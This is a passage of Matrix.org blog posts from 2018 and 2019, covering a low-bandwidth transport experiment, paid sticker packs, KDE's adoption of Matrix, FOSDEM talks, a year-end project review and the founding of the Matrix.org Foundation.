  • The CoAP payload is compressed via Flate using preshared compression tables derived from compressing large chunks of representative Matrix traffic. This could be significantly improved in future with streaming compression and dynamic tables (albeit seeded from a common set of tables).
The end result is that you end up taking about 90 bytes (including ethernet headers!) to send a typical Matrix message (and about 70 bytes to receive the acknowledgement).  This breaks down as as:
  • 14 bytes of Ethernet headers
  • 20 bytes of IP headers
  • 8 bytes of UDP headers
  • 16 bytes of Noise AEAD
  • 6 bytes of CoAP headers
  • ~26 bytes of compressed and encrypted CBOR
The Noise handshake on connection setup would take an additional 128 bytes (4x 32 byte Curve25519 DH values), either spread over 1RTT for initial setup or 0RTT for subsequent setups.

At 100bps, 90 bytes takes 90*8/100 = 7.2s to send... which is just about usable in an extreme life and death situation where you can only get 100bps of connectivity (e.g. someone at the bottom of a ravine trying to trickle data over one bar of GPRS to the emergency services).  In practice, on a custom network, you could ditch the Ethernet and UDP/IP headers if on a point-to-point link for CS API, and ditch the encryption if the network physical layer was trusted - at which point we're talking ~32 bytes per request (2.5s to send at 100bps).  Then, there's still a whole wave of additional work that could be investigated, including...

  • Smarter streaming compression (so that if a user says 'Hello?' three times in a row, the 2nd and 3rd messages are just references to the first pattern)
  • Hoisting Matrix transaction IDs up to the CoAP layer (reusing the CoAP msgId+token rather than passing around new Matrix transaction IDs, at the expense of requiring one Matrix txn per request)
  • Switching to CoAP OBSERVE for receiving data from the server (currently we long-poll /sync to receive data)
  • Switching access_tokens for PSKs or similar
...all of which could shrink the payload down even further.  That said, even in its current state, it's a massive improvement - roughly ~65x better than the equivalent HTTPS+JSON traffic.

In practice, further work on low-bandwidth Matrix is dependent on finding a sponsor who's willing to fund the team to focus on this, as otherwise it's hard to justify spending time here in addition to all the less exotic business-as-usual Matrix work that we need to keep the core of Matrix evolving (finishing 1.0, finishing E2E encryption, speeding up Synapse, finishing Dendrite, rewriting Riot/Android etc).  However, the benefits here should be pretty obvious: massively reduced bandwidth and battery-life; resilience to catastrophic network conditions; faster sync times; and even a protocol suitable for push notifications (Matrix as e2e encrypted, decentralised, push!).  If you're interested in supporting this work, please contact support at matrix.org.

Experiments with payments over Matrix

07.03.2019 00:00 — In the News Matthew Hodgson

Hi all,

Heads up that Modular.im (the paid hosting Matrix service provided by New Vector, the company who employs much of the Matrix core team) launched a pilot today for paid Matrix integrations in the form of paid sticker packs.  Yes kids, it's true - for only $0.50 you can slap Matrix and Riot hex stickers all over your chatrooms. It's a toy example to test the payments infrastructure and demonstrate the concept - the proceeds go towards funding development work on Matrix.org :)   You can read more about over on Modular's blog.

We wanted to elaborate on this a bit from the Matrix.org perspective, specifically:

  • We are categorically not baking payments or financial incentives as a first class citizen into Matrix, and we're not going to start moving stuff behind paywalls or similar.
  • This demo is a proof-of-concept to illustrate how folks could do this sort of thing in general in Matrix - it's not a serious product in and of itself.
  • What it shows is that an Integration Manager like Modular can be used as a way to charge for services in Matrix - whether that's digital content within an integration, or bots/bridges/etc.
  • While Modular today gathers payments via credit-card (Stripe), it could certainly support other mechanisms (e.g. cryptocurrencies) in future.
  • The idea in future is for Modular to provide this as a mechanism that anyone can use to charge for content on Matrix - e.g. if you have your own sticker pack and want to sell it to people, you'll be able to upload it and charge people for it.
Meanwhile, there's a lot of interesting stuff on the horizon with integration managers in general - see MSC1236 and an upcoming MSC from TravisR (based around https://github.com/matrix-org/matrix-doc/issues/1286) proposing new integration capabilities.  We're also hoping to implement inline widgets soon (e.g. chatbot buttons for voting and other semantic behaviour) which should make widgets even more interesting!

So, feel free to go stick some hex stickers on your rooms if you like and help test this out.  In future there should be more useful things available :)

Welcome to Matrix, KDE!

20.02.2019 00:00 — General Matthew Hodgson

Hi all,

We're very excited to officially welcome the KDE Community on to Matrix as they announce that KDE Community is officially adopting Matrix as a chat platform, and kde.org now has an official Matrix homeserver!

You can see the full announcement and explanation over at https://dot.kde.org/2019/02/20/kde-adding-matrix-its-im-framework.  It is fantastic to see one of the largest Free Software communities out there proactively adopting Matrix as an open protocol, open network and FOSS project, rather than drifting into a proprietary centralised chat system.  It's also really fun to see Riot 1.0 finally holding its own as a chat app against the proprietary alternatives!

This doesn't change the KDE rooms which exist in Matrix today or indeed the KDE Freenode IRC channels - so many of the KDE community were already using Matrix, all the rooms already exist and are already bridged to the right places.  All it means is that there's now a shiny new homeserver (powered by Modular.im) on which KDE folk are welcome to grab an account if they want, rather than sharing the rather overloaded public matrix.org homeserver.  The rooms have been set up on the server to match their equivalent IRC channels - for instance, #kde:kde.org is the same as #kde on Freenode; #kde-devel:kde.org is the same as #kde-devel etc.  The rooms continue to retain their other aliases (#kde:matrix.org, #freenode_#kde:matrix.org etc) as before.

There's also a dedicated Riot/Web install up at https://webchat.kde.org, and instructions on connecting via other Matrix clients up at https://community.kde.org/Matrix.

This is great news for the Matrix ecosystem in general - and should be particularly welcome for Qt client projects like Quaternion, Spectral and Nheko-Reborn, who may feel a certain affinity to KDE!

So: welcome, KDE!  Hope you have a great time, and please let us know how you get on, so we can make sure Matrix kicks ass for you :)

  • the Matrix Core Team

Matrix at FOSDEM 2019

04.02.2019 00:00 — In the News Matthew Hodgson

Hi all,

We just got back from braving the snow in Brussels at FOSDEM 2019 - Europe's biggest Open Source conference. I think it's fair to say we had an amazing time, with more people than ever before wanting to hang out and talk Matrix and discuss their favourite features (and bugs)!

The big news is that we released r0.1 of Matrix's Server-Server API late on Friday night - our first ever formal stable release of Matrix's Federation API, having addressed the core of the issues which have kept Federation in beta thus far. We'll go into more detail on this in a dedicated blog post, but this marks the first ever time that all of Matrix's APIs have had an official stable release.  All that remains before we declare Matrix out of beta is to release updates of the CS API (0.5) and possibly the IS API (0.2) and then we can formally declare the overall combination as Matrix 1.0 :D

We spoke about SS API r0.1 at length in our main stage FOSDEM talk on Saturday - as well as showing off the Riot Redesign, the E2E Encryption Endgame and giving an update on the French Government deployment of Matrix and the focus it's given us on finally shipping Matrix 1.0! For those who weren't there or missed the livestream, here's the talk!  Slides are available here.

Full house for @ara4n talking about @matrixdotorg and the French State @fosdem It was a packed presentation full of lots exciting progress demos. So sorry for practically yanking you offstage in the end! pic.twitter.com/idshDcSRhv

— Rob Pickering (@RobinJPickering) February 2, 2019

Then, on Sunday we had the opportunity to have a quick 20 minute talk in the Real Time Comms dev room, where we gave a tour of some of the work we've been doing recently to scale Matrix down to working on incredibly low bandwidth networks (100bps or less).  It's literally the opposite of the Matrix 1.0 / France talk in that it's a quick deep dive into a very specific problem area in Matrix - so, if you've been looking forward to Matrix finally having a better transport than HTTPS+JSON, here goes!  Slides are available here.

Full house for @matrixdotorg ? #FOSDEM #RTCsevroom pic.twitter.com/dDQnD3mzmc

— Saúl Ibarra Corretgé (@saghul) February 3, 2019

Huge thanks to everyone who came to the talks, and everyone who came to the stand or grabbed us for a chat! FOSDEM is an amazing way to be reminded in person that folks care about Matrix, and we've come away feeling more determined than ever to make Matrix as great as possible and provide a protocol+network which will replace the increasingly threatened proprietary communication silos. :)

Next up: Matrix 1.0...

The 2018 Matrix Holiday Special!

25.12.2018 00:00 — General Matthew Hodgson

Hi all,

It's that time again where we break out the mince pies and brandy butter (at least for those of us in the UK) and look back on the year to see how far Matrix has come, as well as anticipate what 2019 may bring!

Overview

It's fair to say that 2018 has been a pretty crazy year.  We have had one overriding goal: to take the funding we received in January, stabilise and freeze the protocol and get it and the reference implementations out of beta and to a 1.0 - to provide a genuinely open and decentralised mainstream alternative to the likes of Slack, Discord, WhatsApp etc.  What's so crazy about that, you might ask?

Well, in parallel with this we've also seen adoption of Matrix accelerating ahead of our dev plan at an unprecedented speed: with France selecting Matrix to power the communication infrastructure of its whole public sector - first trialling over the summer, and now confirmed for full roll-out as of a few weeks ago.  Meanwhile there are several other similar-sized projects on the horizon which we can't talk about yet.  We've had the growing pains of establishing New Vector as a startup in order to hire the core team and support these projects.  We've launched Modular to provide professional-quality SaaS Matrix hosting for the wider community and help fund the team.  And most importantly, we've also been establishing the non-profit Matrix.org Foundation to formalise the open governance of the Matrix protocol and protect and isolate it from any of the for-profit work.

However: things have just about come together.  Almost all the spec work for 1.0 is done and we are now aiming to get a 1.0 released in time by the end of January (in time for FOSDEM).  Meanwhile Synapse has improved massively in terms of performance and stability (not least having migrated over to Python 3); Riot's spectacular redesign is now available for testing right now; E2E encryption is more stable than ever with the usability rework landing as we speak.  And we've even got a full rewrite of Riot/Android in the wings.

But it's certainly been an interesting ride.  Longer-term spec work has been delayed by needing to apply band-aids to mitigate abuse of the outstanding issues.  Riot redesign was pushed back considerably due to prioritising Riot performance over UX. The E2E UX work has forced us to consider E2E holistically… which does not always interact well with structuring the dev work into bite-sized chunks.  Dendrite has generally been idling whilst we instead pour most of our effort into getting to 1.0 on Synapse (rather than diluting 1.0 work across both projects). These tradeoffs have been hard to make, but hopefully we have chosen the correct path in the end.

Overall, as we approach 1.0, the project is looking better than ever - hopefully everyone has seen both Riot and Synapse using less RAM and being more responsive and stable, E2E being more reliable, and anyone who has played with the Riot redesign beta should agree that it is light-years ahead of yesterday's Riot and something which can genuinely surpass today's centralised proprietary incumbents. And that is unbelievably exciting :D

We'd like to thank everyone for continuing to support Matrix - especially our Patreon & Liberapay supporters, whose donations continue to be critical for helping fund the core dev team, and also those who are supporting the project indirectly by hosting homeservers with Modular.  We are going to do everything humanly possible to ship 1.0 over the coming weeks, and then the sky will be the limit!

Before going into what else 2019 will hold, however, let's take the opportunity to give a bit more detail on the various core team projects which landed in 2018…

France

DINSIC (France's Ministry of Digital, IT & Comms) have been busy building out their massive cross-government Matrix deployment and custom Matrix client throughout most of the year.  After the announcement in April, this started off with an initial deployment over the summer, and is now moving towards the full production rollout, as confirmed at the Paris Open Source Summit a few weeks ago by Mounir Mahjoubi, the Secretary of State of Digital.  All the press coverage about this ended up in French, with the biggest writeup being at CIO Online, but the main mention of Matrix (badly translated from French) is:

Denouncing the use of tools such as WhatsApp; a practice that has become commonplace within ministerial offices, Mounir Mahjoubi announced the launch in production of Tchap, based on Matrix and Riot: an instant messaging tool that will be provided throughout the administrations. So, certainly, developing a product can have a certain cost. Integrating it too. "Free is not always cheaper but it's always more transparent," admitted the Secretary of State.

The project really shows off Matrix at its best, with up to 60 different deployments spread over different ministries and departments; multiple clusters per Ministry; end-to-end encryption enabled by default (complete with e2e-aware antivirus scanning); multiple networks for different classes of traffic; and the hope of federating with the public Matrix network once the S2S API is finalised and suitable border gateways are available.  It's not really our project to talk about, but we'll try to share as much info as we can as roll-out continues.

The Matrix Specification

A major theme throughout the year has been polishing the Matrix Spec itself for its first full stable release, having had more than enough time to see which bits work in practice now and which bits need rethinking.  This all kicked off with the creation of the Matrix Spec Change process back in May, which provides a formal process for reviewing and accepting contributions from anyone into the spec.  Getting the balance right between agility and robustness has been quite tough here, especially pre-1.0 where we've needed to move rapidly to resolve the remaining long-lived sticking points.  However, a process like this risks encouraging the classic “Perfect is the Enemy of Good” problem, as all and sundry jump in to apply their particular brand of perfectionism to the spec (and/or the process around it) and risk smothering it to death with enthusiasm.  So we've ended up iterating a few times on the process and hopefully now converged on an approach which will work for 1.0 and beyond. If you haven't checked out the current proposals guide please give it a look, and feel free to marvel at all the MSCs in flight.  You can also see a quick and dirty timeline of all the MSC status changes since we introduced the process, to get an idea of how it's all been progressing.

In August we had a big sprint to cut stable “r0” releases of all the APIs of the spec which had not yet reached a stable release (i.e. all apart from the Client-Server API, which has been stable since Dec 2015 - hence in part the large number of usable independent Matrix clients relative to the other bits of the ecosystem).  In practice, we managed to release 3 out of the 4 remaining APIs - but needed more time to solve the remaining blocking issues with the Server-Server API. So since August (modulo operational and project distractions) we've been plugging away on the S2S API.  

The main blocking issue for a stable S2S API has been State Resolution. This is the fundamental algorithm used to determine the state of a given room whenever a race or partition happens between the servers participating in it.  For instance: if Alice kicks Bob on her server at the same time as Charlie ops Bob on his server, who should win? It's vital that all servers reach the same conclusion as to the state of the room, and we don't want servers to have to replicate a full copy of the room's history (which could be massive) to reach a consistent conclusion.  Matrix's original state resolution algorithm dates back to the initial usable S2S implementation at the beginning of 2015 - but over time deficiencies in the algorithm became increasingly apparent. The most obvious issue is the “Hotel California” bug, where users can be spontaneously re-joined to a room they've previously left if the room's current state is merged with an older copy of the room on another server and the ‘wrong' version wins the conflict - a so-called state-reset.

After a lot of thought we ended up proposing an all new State Resolution algorithm in July 2018, nicknamed State Resolution Reloaded.  This extends the original algorithm to consider the ‘auth chain' of state events when performing state resolution (i.e. the sequence of events that a given state event cites as evidence of its validity) - as well as addressing a bunch of other issues.  For those wishing to understand in more detail, there's the MSC itself, the formal terse description of the algorithm now merged into the unstable S2S spec - or alternatively there's an excellent step-by-step explanation and guided example from uhoreg (warning: contains Haskell :)  Or you can watch Erik and Matthew try to explain it all on Matrix Live back in July.

Since the initial proposal in July, the algorithm has been proofed out in a test jig, iterated on some more to better specify how to handle rejected events, implemented in Synapse, and is now ready to roll.  The only catch is that to upgrade to it we've had to introduce the concept of room versioning, and to flush out historical issues we require you to re-create rooms to upgrade them to the new resolution algorithm. Getting the logistics in place for this is a massive pain, but we've got an approach now which should be sufficient. Clients will be free to smooth over the transition in the UI as gracefully as possible (and in fact Riot has this already hooked up).  So: watch this space as v2 rooms with all-new state resolution in the coming weeks!

Otherwise, there are a bunch of other issues in the S2S API which we are still working through (e.g. changing event IDs to be hashes of event contents to avoid lying about IDs, switching to use normal X.509 certificates for federation and so resolve problems with Perspectives, etc).  

Once these land and are implemented in Synapse over the coming weeks, we will be able to finally declare a 1.0!

Also on the spec side of things, it's worth noting that a lot of effort went into improving performance for clients in the form of the Lazy Loading Members MSC.  This ended up consuming a lot of time over the summer as we updated Synapse and the various matrix-*-sdks (and thus Riot) to only calculate and send details to the clients about members who are currently talking in a room, whereas previously we sent the entire state of the room to the client (even including users who had left). The end result however is a 3-5x reduction in RAM on Riot, and a 3-5x speedup on initial sync.  The current MSC is currently being merged as we speak into the main spec (thanks Kitsune!) for inclusion in upcoming CS API 0.5.

The Matrix.org Foundation (CIC!)

Alongside getting the open spec process up and running, we've been establishing The Matrix.org Foundation as an independent non-profit legal entity responsible for neutrally safeguarding the Matrix spec and evolution of the protocol.  This kicked off in June with the “Towards Open Governance” blog post, and continued with the formal incorporation of The Matrix.org Foundation in October.  Since then, we've spent a lot of time with the non-profit lawyers evolving MSC1318 into the final Articles of Association (and other guidelines) for the Foundation.  This work is basically solved now; it just needs MSC1318 to be updated with the conclusions (which we're running late on, but is top of Matthew's MSC todo list).

In other news, we have confirmation that the Community Interest Company (CIC) status for The Matrix.org Foundation has been approved - this means that the CIC Regulator has independently reviewed the initial Articles of Association and approved that they indeed lock the mission of the Foundation to be non-profit and to act solely for the good of the wider online community.  In practice, this means that the Foundation will be formally renamed The Matrix.org Foundation C.I.C, and provides a useful independent safeguard to ensure the Foundation remains on track.

The remaining work on the Foundation is:

  • Update and land MSC1318, particularly on clarifying the relationship between the legal Guardians (Directors) of the Foundation and the technical members of the core spec team, and how funds of the Foundation will be handled.
  • Update the Articles of Association of the Foundation based on the end result of MSC1318
  • Transfer any Matrix.org assets over from New Vector to the Foundation.  Given Matrix's code is all open source, there isn't much in the way of assets - we're basically talking about the matrix.org domain and website itself.
  • Introduce the final Guardians for the Foundation.
We'll keep you posted with progress as this lands over the coming months.

Riot

2018 has been a bit of a chrysalis year for Riot: the vast majority of work has been going into the massive redesign we started in May to improve usability & cosmetics, performance, stability, and E2E encryption usability improvements.  We've consciously spent most of the year feature frozen in order to polish what we already have, as we've certainly been guilty in the past of landing way too many features without necessarily applying the needed amount of UX polish.

However, as of today, we're super-excited to announce that Riot's redesign is at the point where the intrepid can start experimenting with it - in fact, internally most of the team has switched over to dogfooding (testing) the redesign as of a week or so ago.  Just shut down your current copy of Riot/Web or Desktop and go to https://riot.im/experimental instead if you want to experiment (we don't recommend running both at the same time).  Please note that it is still work-in-progress and there's a lot of polish still to land and some cosmetic bugs still hanging around, but it's definitely at the point of feeling better than the old app.  Most importantly, please provide feedback (by hitting the lifesaver-ring button at the bottom left) to let us know how you get on. See the Riot blog for more details!

Meanwhile, on the performance and stability side of things - Lazy Loading (see above) made a massive difference to performance on all platforms; shrinking RAM usage by 3-5x and similarly speeding up launch and initial sync times.  Ironically, this ended up pushing back the redesign work, but hopefully the performance improvements will have been noticeable in the interim.  We also switched the entire rich text composer from using Facebook's Draft.js library to instead use Slate.js (which has generally been a massive improvement for stability and maintainability, although took ages to land - huge thanks to t3chguy for getting it over the line). Meanwhile Travis has been blitzing through a massive list of key “First Impression” bugs to ensure that as many of Riot's most glaring usability gotchas are solved.

We also welcomed ever-popular Stickers to the fold - the first instance of per-account rather than per-room widgets, which ended up requiring a lot of new infrastructure in both Riot and the underlying integration manager responsible for hosting the widgets.  But judging by how popular they are, the effort seems to be worth it - and paves the way for much more exciting interactive widgets and integrations in future!

An unexpectedly large detour/distraction came in the form of GDPR back in May - we spent a month or so running around ensuring that both Riot and Matrix are GDPR compliant (including the necessary legal legwork to establish how GDPR even applies to a decentralised technology like Matrix).  If you missed all that fun, you can read about it here.  Hopefully we won't have to do anything like that again any time soon...

And finally: on the mobile side, much of the team has been distracted helping out France with their Matrix deployment.  However, we've been plugging away on Riot/Mobile, keeping pace with the development on Riot/Web - but most excitingly, we've also found time to experiment with a complete rewrite of Riot/Android in Kotlin, using Realm and Rx (currently nicknamed Riot X).  The rewrite was originally intended as a test-jig for experimenting with the redesign on mobile, but it's increasingly becoming a fully fledged Matrix client… which launches and syncs over 5x faster than today's Riot/Android.  If you're particularly intrepid you should be able to run the app by checking out the project in Android Studio and hitting ‘run'. We expect the rewrite to land properly in the coming months - watch this space for progress!

E2E Encryption

One of the biggest projects this year has been to get E2E encryption out of beta and turned on by default.  Now, whilst the encryption itself in Matrix has been cryptographically robust since 2016 - its usability has been minimal at best, and we'd been running around polishing the underlying implementation rather than addressing the UX.  However, this year that changed, as we opened a war on about 6 concurrent battlefronts to address the remaining issues. These are:

  • Holistic UX.  Designing a coherent, design-led UX across all of the encryption and key-management functionality.  Nad (who joined Matrix as a fulltime Lead UI/UX designer in August) has been leading the charge on this - you can see a preview of the end result here.  Meanwhile, Dave and Ryan are working through implementing it as we speak.
  • Decryption failures (UISIs).  Whenever something goes wrong with E2E encryption, the symptoms are generally the same: you find yourself unable to decrypt other people's messages.  We've been plugging away chasing these down - for instance, switching from localStorage to IndexedDB in Riot/Web for storing encryption state (to make it harder for multiple tabs to collide and corrupt your encryption state); providing mechanisms to unwedge Olm sessions which have got corrupted (e.g. by restoring from backup); and many others.  We also added full telemetry to track the number of UISIs people are seeing in practice - and the good news is that over the course of the year their occurrence has been steadily reducing.  The bad news is that there are still some edge cases left: so please, whenever you fail to decrypt a message, please make sure you submit a bug report and debug logs from *both* the sender and receiving device.  The end is definitely in sight on these, however, and good news is other battlefronts will also help mitigate UISIs.
  • Incremental Key Backup.  Previously, if you only used one device (e.g. your phone) and you lost that phone, you would lose all your E2E history unless you were in the habit of explicitly manually backing up your keys.  Nowadays, we have the ability to optionally let users encrypt their keys with a passphrase (or recovery key) and constantly upload them to the server for safe keeping.  This was a significant chunk of work, but has actually landed already in Riot/Web and Riot/iOS, but is hidden behind a “Labs” feature flag in Settings whilst we test it and sort out the final UX.
  • Cross-signing Keys. Previously, the only way to check whether you were talking to a legitimate user or an imposter was to independently compare the fingerprints of the keys of the device they claim to be using.  In the near future, we will let users prove that they own their devices by signing them with a per-user identity key, so you only have to do this check once. We've actually already implemented one iteration of cross-signing, but this allowed arbitrary devices for a given user to attest each other (which creates a directed graph of attestations, and associated problems with revocations), hence switching to a simpler approach.
  • Improved Verification. Verifying keys by manually comparing elliptic key fingerprints is incredibly cumbersome and tedious.  Instead, we have proposals for using Short Authentication String comparisons and QR-code scanning to simplify the process.  uhoreg is currently implementing these as we speak :)
  • Search.  Solving encrypted search is Hard, but t3chguy did a lot of work earlier in the year to build out matrix-search: essentially a js-sdk bot which you can host, hand your keys to, and will archive your history using a golang full-text search engine (bleve) and expose a search interface that replaces Synapse's default one.  Of all the battlefronts this one is progressing the least right now, but the hope is to integrate it into Riot/Desktop or other clients so that folks who want to index all their conversations have the means to do so.  On the plus side, all the necessary building blocks are available thanks to t3chguy's hacking.
So, TL;DR: E2E is hard, but the end is in sight thanks to a lot of blood, sweat and tears.  It's possible that we may have opened up too many battlefronts in finishing it off rather than landing stuff gradually.  But it should be transformative when it all lands - and we'll finally be able to turn it on by default for private conversations.  Again, we're aiming to pull this together by the end of January.

Separately, we've been keeping a close eye on MLS - the IETF's activity around standardising scalable group E2E encryption.  MLS has a lot of potential and could provide algorithmic improvements over Olm & Megolm (whist paving the way for interop with other MLS-encrypted comms systems).  But it's also quite complicated, and is at risk of designing out support of decentralised environments. For now, we're obviously focusing on ensuring that Matrix is rock solid with Olm & Megolm, but once we hit that 1.0 we'll certainly be experimenting a bit with MLS too.

Homeservers

The story of the Synapse team in 2018 has been one of alternating between solving scaling and performance issues to support the ever-growing network (especially the massive matrix.org server)... and dealing with S2S API issues; both in terms of fixing the design of State Resolution, Room Versioning etc (see the Spec section above) and doing stop-gap fixes to the current implementation.

Focusing on the performance side of things, the main wins have been:

  • Splitting yet more functionality out into worker processes which can scale independently of the master Synapse process.
  • Yet more profiling and optimisation (particularly caching).  Between this and the worker split-out we were able to resolve the performance ceiling that we hit over the summer, and as of right now matrix.org feels relatively snappy.
  • Lazy Loading Members.
  • Python 3.  As everyone should have seen by now, Synapse is now Python 3 by default as of 0.34, which provides significant RAM and CPU improvements across the board as well as a path forwards given Python 2's planned demise at the end of 2019.  If you're not running your Synapse on Python 3 today, you are officially doing it wrong.
There are also some major improvements which haven't fully landed yet:
  • State compression.  We have a new algorithm for storing room state which is ~10x more efficient than the current one.  We'll be migrating to it in by default in future. If you're feeling particularly intrepid you can actually manually use it today (but we don't recommend it yet).
  • Incremental state resolution.  Before we got sucked into redesigning state resolution in general, Erik came up with a proof that it's possible to memoize state resolution and incrementally calculate it whenever state is resolved in a room rather than recalculate it from scratch each time (as is the current implementation).  This would be a significant performance improvement, given non-incremental state res can consume a lot of CPU (making everything slow down when there are lots of room extremities to resolve), and can consume a lot of RAM and has been one of the reasons that synapse's RAM usage can sometimes spike badly. The good news is that the new state res algorithm was designed to also work in this manner.  The bad news is that we haven't yet got back to implementing it yet, given the new algorithm is only just being rolled out now.
  • Chunks.  Currently, Synapse models all events in a room as being part of a single DAG, which can be problematic if you can see lots of disconnected sections of the DAG (e.g. due to intermittent connectivity somewhere in the network), as Synapse will frantically try to resolve all these disconnected sections of DAG together.  Instead, a better solution is to explicitly model these sections of DAG as separate entities called Chunks, and not try to resolve state between disconnected Chunks but instead consider them independent fragments of the room - and thus simplify state resolution calculations significantly. It also fixes an S2S API design flaw where previously we trusted the server to state the ordering (depth) of events they provided; with chunks, the receiving server can keep track of that itself by tracking a DAG of chunks (as well as the normal event DAG within the chunks).  Now, most of the work for this happened already, but is currently parked until new state res has landed.
Meanwhile, over on Dendrite, we made the conscious decision to get 1.0 out the door on Synapse first rather than trying to implement and iterate on the stuff needed for 1.0 on both Synapse & Dendrite simultaneously.  However, Dendrite has been ticking along thanks to work from Brendan, Anoa and APWhitehat - and the plan is to use it for more niche homeserver work at first; e.g. constrained resource devices (Dendrite uses 5-10x less RAM than Synapse on Py3), clientside homeservers, experimental routing deployments, etc.  In the longer term we expect it to grow into a fully fledged HS though!

Bridging

2018 was a bit of a renaissance for Bridging, largely thanks to Half-Shot coming on board in the Summer to work on IRC bridging and finally get to the bottom of the stability issues which plagued Freenode for the previous, uh, few years.  Meanwhile the Slack bridge got its first ever release - and more recently there's some Really Exciting Stuff happening with matrix-appservice-purple; a properly usable bridge through to any protocol that libpurple can speak… and as of a few days ago also supports native XMPP bridging via XMPP.js.  There'll probably be a dedicated blogpost about all of this in the new year, especially when we deploy it all on Matrix.org. Until then, the best bet is to learn more is to watch last week's Matrix Live and hear it all first hand.

Modular

One of the biggest newcomers of 2018 was the launch of Modular.im in October - the world's first commercial Matrix hosting service.  Whilst (like Riot), Modular isn't strictly-speaking a Matrix.org project - it feels appropriate to mention it here, not least because it's helping directly fund the core Matrix dev team.

So far Modular has seen a lot of interest from folks who want to spin up a super-speedy dedicated homeserver run by us rather than having to spend the time to build one themselves - or folks who have yet to migrate from IRC and want a better-than-IRC experience which still bridges well.  One of the nice bits is that the servers are still decentralised and completely operationally independent of one another, and there have been a bunch of really nice refinements since launch, including the ability to point your own DNS at the server; matrix->matrix migration tools; with custom branding and other goodness coming soon.  If you want one-click Matrix hosting, please give Modular a go :)

Right now we're promoting Modular mainly to existing Matrix users, but once the Riot redesign is finished you should expect to see some very familiar names popping up on the platform :D

TWIM

Unless you were living under a rock, you'll hopefully have also realised that 2018 was the year that brought us This Week In Matrix (TWIM) - our very own blog tracking all the action across the whole Matrix community on a weekly basis.  Thank you to everyone who contributes updates, and to Ben for editing it each week. Go flip through the archives to find out what's been going on in the wider community over the course of the year!  (This blog post is already way too long without trying to cover the rest of the ecosystem too :)

Shapes of Things to Come

Finally, a little Easter egg (it is Christmas, after all) for anyone crazy enough to have read this far: The eagle-eyed amongst you might have noticed that one of our accepted talks for FOSDEM 2019 is “Breaking the 100bps barrier with Matrix” in the Real Time Communications devroom.  We don't want to spoil the full surprise, but here's a quick preview of some of the more exotic skunkworks we've been doing on low-bandwidth routing and transports recently.  Right now it shamelessly assumes that you're running within a trusted network, but once we solve that it will of course be be proposed as an MSC for Matrix proper.  A full write-up and code will follow, but for now, here's a mysterious video…

(If you're interested in running Matrix over low-bandwidth networks, please get in touch - we'd love to hear from you...)

2019

So, what will 2019 bring?

In the short term, as should be obvious from the above, our focus is on:

  • r0 spec releases across the board (aka Matrix 1.0)
  • Implementing them in Synapse
  • Landing the Riot redesign
  • Landing all the new E2E encryption UX and features
  • Finalising the Matrix.org Foundation
However, beyond that, there's a lot of possible options on the table in the medium term:
  • Reworking and improving Communities/Groups.
  • Reactions.
  • E2E-encrypted Search
  • Filtering. (empowering users to filter out rooms & content they're not interested in).
  • Extensible events.
  • Editable messages.
  • Extensible Profiles (we've actually been experimenting with this already).
  • Threading.
  • Landing the Riot/Android rewrite
  • Scaling synapse via sharding the master process
  • Bridge UI for discovery of users/rooms and bridge status
  • Considering whether to do a similar overhaul of Riot/iOS
  • Bandwidth-efficient transports
  • Bandwidth-efficient routing
  • Getting Dendrite to production.
  • Inline widgets (polls etc)
  • Improving VoIP over Matrix.
  • Adding more bridges, and improving the current ones..
  • Account portability
  • Replacing MXIDs with public keys
In the longer term, options include:
  • Shared-code cross-platform client SDKs (e.g. sharing a native core library between matrix-{'{'}js,ios,android{'}'}-sdk)
  • Matrix daemons (e.g. running an always-on client as a background process in your OS which apps can connect to via a lightweight CS API)
  • Push notifications via Matrix (using a daemon-style architecture)
  • Clientside homeservers (i.e. p2p matrix) - e.g. compiling Dendrite to WASM and running it in a service worker.
  • Experimenting with MLS for E2E Encryption
  • Storing and querying more generic data structures in Matrix (e.g. object trees; scene graphs)
  • Alternate use cases for VR, IoT, etc.
Obviously we're not remotely going to do all of that in 2019, but this serves to give a taste of the possibilities on the menu post-1.0; we'll endeavour to publish a more solid roadmap when we get to that point.

And on that note, it's time to call this blogpost to a close. Thanks to anyone who read this far, and thank you, as always, for flying Matrix and continuing to support the project.  The next few months should be particularly fun; all the preparation of 2018 will finally pay off :)

Happy holidays,

Matthew, Amandine & the whole Matrix.org team.

Introducing the Matrix.org Foundation (Part 1 of 2)

29.10.2018 00:00 — General Matthew Hodgson

Hi all,

Back in June we blogged about the plan of action to establish a formal open governance system for the Matrix protocol: introducing both the idea of the Spec Core Team to act as the neutral technical custodian of the Matrix Spec, as well as confirming the plan to incorporate the Matrix.org Foundation to act as a neutral non-profit legal entity which can act as the legal Guardian for Matrix's intellectual property, gather donations to fund Matrix work, and be legally responsible for maintaining and evolving the spec in a manner which benefits the whole ecosystem without privileging any individual commercial concerns.  We published a draft proposal for the new governance model at MSC1318: a proposal for open governance of the Matrix.org Spec to gather feedback and to trial during the day-to-day development of the spec. Otherwise, we refocused on getting a 1.0 release of the Spec out the door, given there's not much point in having a fancy legal governance process to safeguard the evolution of the Spec when we don't even have a stable initial release!

We were originally aiming for end of August to publish a stable release of all Matrix APIs (and thus a so-called 1.0 of the overall standard) - and in the end we managed to publish stable releases of 4 of the 5 APIs (Client-Server, Application Service, Identity Service and Push APIs) as well as a major overhaul of the Server-Server (SS) API.  However, the SS API work has run on much longer than expected, as we've ended up both redesigning and needing to implement many major changes to to the protocol: the new State Resolution algorithm (State Resolution Reloaded) to fix state resets; versioned rooms (in order to upgrade to the new algorithm); changing event IDs to be hashes; and fixing a myriad federation bugs in Synapse.  Now, the remaining work is progressing steadily (you can see the progress over at https://github.com/orgs/matrix-org/projects/2 - although some of the cards are redacted because they refer to non-spec consulting work) - and the end is in sight!

So, in preparation for the upcoming Matrix 1.0 release, we've been moving ahead with the rest of the open governance plan - and we're happy to announce that as of a few hours ago, the initial incarnation of The Matrix.org Foundation exists!

Now, it's important to understand that this process is not finished - what we've done is to set up a solid initial basis for the Foundation in order to finish refining MSC1318 and turning it into the full Articles of Association of the Foundation (i.e. the legal framework which governs the remit of the Foundation), which we'll be working on over the coming weeks.

In practice, what this means is that in the first phase, today's Foundation gives us:

  • A UK non-profit company - technically incorporated as a private company, limited by guarantee.
  • Guardians, whose role is to be legally responsible for ensuring that the Foundation (and by extension the Spec Core Team) keeps on mission and neutrally protects the development of Matrix.  Matrix's Guardians form the Board of Directors of the Foundation, and will provide a 'checks and balances' mechanism between each other to ensure that all Guardians act in the best interests of the protocol and ecosystem.

